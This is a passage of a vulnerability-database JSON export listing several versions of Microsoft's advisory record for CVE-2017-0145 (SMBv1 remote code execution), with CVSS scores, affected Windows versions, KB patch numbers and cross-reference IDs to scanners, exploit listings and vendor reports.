Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB4014077", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", "KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4014077", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 
installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": 
"KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for 
x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 
Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", 